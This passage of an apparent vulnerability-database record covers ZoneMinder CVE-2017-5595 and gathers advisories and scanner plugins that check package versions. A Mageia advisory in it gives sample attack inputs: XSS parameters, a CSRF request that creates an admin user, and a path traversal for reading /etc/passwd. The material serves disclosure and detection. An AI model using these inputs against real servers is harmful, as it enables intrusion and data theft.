USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872361\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-20 11:39:03 +0100 (Mon, 20 Feb 2017)\");\n script_cve_id(\"CVE-2017-5595\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for zoneminder FEDORA-2017-2bb174ae3c\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zoneminder'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"zoneminder on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-2bb174ae3c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O4REEDSS44EFX6Q5HQ6SWM5HVYRNLNGF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"zoneminder\", rpm:\"zoneminder~1.28.1~8.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2023-12-02T16:52:46", "description": "Package : zoneminder\nVersion : 1.25.0-4+deb7u2\nCVE ID : CVE-2017-5595\n\nMultiple vulnerabilities have been found in zoneminder. This update\nfixes only a serious file disclosure vulnerability (CVE-2017-5595).\n\nThe application has been found to suffer from many other problems\nsuch as SQL injection vulnerabilities, cross-site scripting issues,\ncross-site request forgery, session fixation vulnerability. Due to the\namount of issues and to the relative invasiveness of the relevant patches,\nthose issues will not be fixed in Wheezy. We thus advise you to restrict\naccess to zoneminder to trusted users only. If you want to review the\nlist of ignored issues, you can check the security tracker:\nhttps://security-tracker.debian.org/tracker/source-package/zoneminder\n\nWe recommend that you upgrade your zoneminder packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n- -- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: https://www.freexian.com/services/debian-lts.html\nLearn to master Debian: https://debian-handbook.info/get/", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-26T16:18:22", "type": "debian", "title": "[SECURITY] [DLA 1145-1] zoneminder security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-10-26T16:18:22", "id": "DEBIAN:DLA-1145-1:650B0", "href": "https://lists.debian.org/debian-lts-announce/2017/10/msg00024.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "ZoneMinder is a set of applications which is intended to provide a complete solution allowing you to capture, analyse, record and monitor any cameras y ou have attached to a Linux based machine. It is designed to run on kernels wh ich support the Video For Linux (V4L) interface and has been tested with cameras attached to BTTV cards, various USB cameras and IP network cameras. It is designed to support as many cameras as you can attach to your computer with out too much degradation of performance. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-18T18:50:20", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: zoneminder-1.28.1-8.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-18T18:50:20", "id": "FEDORA:8E1B06091F48", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/25GCK3X4C2XY4YBBWCKSWDEYWBHTJKGV/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "description": "ZoneMinder is a set of applications which is intended to provide a complete solution allowing you to capture, analyse, record and monitor any cameras y ou have attached to a Linux based machine. It is designed to run on kernels wh ich support the Video For Linux (V4L) interface and has been tested with cameras attached to BTTV cards, various USB cameras and IP network cameras. It is designed to support as many cameras as you can attach to your computer with out too much degradation of performance. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-18T18:21:48", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: zoneminder-1.28.1-8.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-18T18:21:48", "id": "FEDORA:D8A4C62F5477", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/O4REEDSS44EFX6Q5HQ6SWM5HVYRNLNGF/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2023-12-02T15:40:31", "description": "Multiple vulnerabilities have been found in zoneminder. This update fixes only a serious file disclosure vulnerability (CVE-2017-5595).\n\nThe application has been found to suffer from many other problems such as SQL injection vulnerabilities, cross-site scripting issues, cross-site request forgery, session fixation vulnerability. Due to the amount of issues and to the relative invasiveness of the relevant patches, those issues will not be fixed in Wheezy. We thus advise you to restrict access to zoneminder to trusted users only. If you want to review the list of ignored issues, you can check the security tracker:\nhttps://security-tracker.debian.org/tracker/source-package/zoneminder\n\nWe recommend that you upgrade your zoneminder packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-10-27T00:00:00", "type": "nessus", "title": "Debian DLA-1145-1 : zoneminder security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5595"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:zoneminder", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1145.NASL", "href": "https://www.tenable.com/plugins/nessus/104184", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1145-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104184);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-5595\");\n\n script_name(english:\"Debian DLA-1145-1 : zoneminder security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been found in zoneminder. This update\nfixes only a serious file disclosure vulnerability (CVE-2017-5595).\n\nThe application has been found to suffer from many other problems such\nas SQL injection vulnerabilities, cross-site scripting issues,\ncross-site request forgery, session fixation vulnerability. Due to the\namount of issues and to the relative invasiveness of the relevant\npatches, those issues will not be fixed in Wheezy. We thus advise you\nto restrict access to zoneminder to trusted users only. If you want to\nreview the list of ignored issues, you can check the security tracker:\nhttps://security-tracker.debian.org/tracker/source-package/zoneminder\n\nWe recommend that you upgrade your zoneminder packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/10/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/zoneminder\"\n );\n # https://security-tracker.debian.org/tracker/source-package/source-package/zoneminder\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?939a50b4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected zoneminder package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:zoneminder\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"zoneminder\", reference:\"1.25.0-4+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:28:46", "description": "Security fix for CVE-2017-5595\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-02-21T00:00:00", "type": "nessus", "title": "Fedora 24 : zoneminder (2017-d5fb74cd2e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5595"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zoneminder", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-D5FB74CD2E.NASL", "href": "https://www.tenable.com/plugins/nessus/97250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-d5fb74cd2e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97250);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5595\");\n script_xref(name:\"FEDORA\", value:\"2017-d5fb74cd2e\");\n\n script_name(english:\"Fedora 24 : zoneminder (2017-d5fb74cd2e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5595\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-d5fb74cd2e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zoneminder package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zoneminder\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"zoneminder-1.28.1-8.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zoneminder\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:28:46", "description": "Security fix for CVE-2017-5595\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-02-21T00:00:00", "type": "nessus", "title": "Fedora 25 : zoneminder (2017-2bb174ae3c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5595"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zoneminder", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-2BB174AE3C.NASL", "href": "https://www.tenable.com/plugins/nessus/97243", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-2bb174ae3c.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97243);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-5595\");\n script_xref(name:\"FEDORA\", value:\"2017-2bb174ae3c\");\n\n script_name(english:\"Fedora 25 : zoneminder (2017-2bb174ae3c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5595\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-2bb174ae3c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zoneminder package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zoneminder\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"zoneminder-1.28.1-8.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zoneminder\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mageia": [{"lastseen": "2023-12-03T17:33:21", "description": "This update fixes the following security issues: Information disclosure and authentication bypass vulnerability exists in the Apache HTTP Server configuration bundled with ZoneMinder v1.30 and v1.29, which allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server via the /events URI. (CVE-2016-10140) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the format parameter in a download log request to index.php. (CVE-2016-10201) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the path info to index.php. (CVE-2016-10202) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the name when creating a new monitor. (CVE-2016-10203) SQL injection vulnerability in Zoneminder 1.30 and earlier allows remote attackers to execute arbitrary SQL commands via the limit parameter in a log query request to index.php. (CVE-2016-10204) Session fixation vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack web sessions via the ZMSESSID cookie. (CVE-2016-10205) Cross-site request forgery (CSRF) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack the authentication of users for requests that change passwords and possibly have unspecified other impact as demonstrated by a crafted user action request to index.php. (CVE-2016-10206) Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view;=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter;[terms][1][cnj]=and[XSS] view=events&filter;%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter;%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit;=1%22%3E%3C/a%3E[XSS] (among others). (CVE-2017-5367) ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others). (CVE-2017-5368) A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path;= request. (CVE-2017-5595) A Cross-Site Scripting (XSS) was discovered in ZoneMinder 1.30.2. The vulnerability exists due to insufficient filtration of user-supplied data (postLoginQuery) passed to the \"ZoneMinder-master/web/skins/classic/views/js/postlogin.js.php\" URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. (CVE-2017-7203) Notes for sysadmins: 1\\. CRSF attacks are now blocked by setting the ZoneMinder variable 'ENABLE_CSRF_MAGIC' to 'yes'. During system update you may want to check that this variable is set. In Mageia 'yes' is the default for new installs of ZoneMInder. 2\\. Changes have been made to /etc/httpd/conf/site.d/zoneminder.conf to mitigate CVE-2016-10140. Make sure to accept the new configuration when updating existing systems. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-10T02:05:58", "type": "mageia", "title": "Updated zoneminder packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10140", "CVE-2016-10201", "CVE-2016-10202", "CVE-2016-10203", "CVE-2016-10204", "CVE-2016-10205", "CVE-2016-10206", "CVE-2017-5367", "CVE-2017-5368", "CVE-2017-5595", "CVE-2017-7203"], "modified": "2017-06-10T02:05:58", "id": "MGASA-2017-0162", "href": "https://advisories.mageia.org/MGASA-2017-0162.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-05T05:18:03", "description": "\nMultiple vulnerabilities have been found in zoneminder. This update\nfixes only a serious file disclosure vulnerability ([CVE-2017-5595](https://security-tracker.debian.org/tracker/CVE-2017-5595)).\n\n\nThe application has been found to suffer from many other problems\nsuch as SQL injection vulnerabilities, cross-site scripting issues,\ncross-site request forgery, session fixation vulnerability. Due to the\namount of issues and to the relative invasiveness of the relevant patches,\nthose issues will not be fixed in Wheezy. We thus advise you to restrict\naccess to zoneminder to trusted users only. If you want to review the\nlist of ignored issues, you can check the security tracker:\n<https://security-tracker.debian.org/tracker/source-package/zoneminder>\n\n\nWe recommend that you upgrade your zoneminder packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\nFor Debian 7 Wheezy, these issues have been fixed in zoneminder version 1.25.0-4+deb7u2\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-26T00:00:00", "type": "osv", "title": "zoneminder - security update", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, 